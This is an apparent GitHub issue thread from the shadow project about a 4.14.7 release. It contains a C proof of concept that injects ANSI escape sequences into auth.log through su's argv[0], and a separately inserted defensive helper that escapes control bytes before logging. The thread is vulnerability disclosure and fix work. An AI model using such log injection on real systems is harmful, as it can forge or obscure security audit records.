shadow-maint / shadow

Upstream shadow tree

4.14.7 oldstable release #959

Closed alejandro-colomar closed 4 months ago

alejandro-colomar commented 5 months ago

And it seems we already have cheese for this. Let's release .7 on the next full moon after the first patches are ready; so possibly on 2024-03-25.

Cc: @skyler-ferrante

skyler-ferrante commented 5 months ago

I tested a few other commands, and it seems like su was the only one that allowed messages to go to auth.log. To summarize the issue I sent in my email, su was allowing an attacker message to go to /var/log/auth.log without checking if it had newlines or escape sequences.

A quick PoC:

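```c
#include <stdio.h>
#include <unistd.h>

int main(void) {
        char* prog = "/usr/bin/su";
        /* argv[0] is set by the caller and carries an ANSI escape sequence */
        char* argv[] = {"\033[33mYellow", "root", NULL};
        char* envp[] = {NULL};
        execve(prog, argv, envp);
        /* only reached if execve() fails */
        printf("Failed to exec\n");
}
```
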
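One way to neutralize the kind of input described in the comment above before it reaches a log line, as an added example that is not part of the thread and not shadow's own code: a hypothetical `log_escape()` helper rewrites control bytes such as ESC and newline as `\xHH`. The helper name, buffer size, syslog ident and message format are assumptions.

```c
#include <string.h>
#include <syslog.h>

/* Hypothetical helper (not shadow's code): copy src into dst, rewriting
 * every byte outside printable ASCII, plus the backslash, as \xHH.
 * Returns 1 if anything was escaped, 0 if not, -1 if dst was too small
 * (dst then holds a truncated but still NUL-terminated string). */
int log_escape(char *dst, size_t dstlen, const char *src)
{
    static const char hex[] = "0123456789abcdef";
    size_t o = 0;
    int changed = 0;

    if (dstlen == 0)
        return -1;
    for (const unsigned char *p = (const unsigned char *)src; *p; p++) {
        int safe = (*p >= 0x20 && *p <= 0x7e && *p != '\\');
        size_t need = safe ? 1 : 4;
        if (o + need >= dstlen) {       /* keep room for the NUL */
            dst[o] = '\0';
            return -1;
        }
        if (safe) {
            dst[o++] = (char)*p;
        } else {
            dst[o++] = '\\';
            dst[o++] = 'x';
            dst[o++] = hex[*p >> 4];
            dst[o++] = hex[*p & 0x0f];
            changed = 1;
        }
    }
    dst[o] = '\0';
    return changed;
}

int main(int argc, char *argv[])
{
    char name[256];                     /* assumed size for the demo */
    /* argv[0] is chosen by the caller of execve(), so treat it as untrusted. */
    int rc = log_escape(name, sizeof name, argc > 0 ? argv[0] : "");

    openlog("log-escape-demo", LOG_PID, LOG_AUTH);
    syslog(LOG_NOTICE, "invoked as '%s'%s", name,
           rc != 0 ? " (name was escaped or truncated)" : "");
    closelog();
    return 0;
}
```

Escaping the backslash as well keeps the output unambiguous: a literal `\x1b` typed by the caller is logged as `\x5cx1b` and cannot be mistaken for an escaped ESC byte.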
alejandro-colomar commented 5 months ago

False alarm. I'll close the issue while there's nothing to fix.

alejandro-colomar commented 5 months ago

The plans for the next moon are alive again. Maybe even earlier, if possible.

alejandro-colomar commented 5 months ago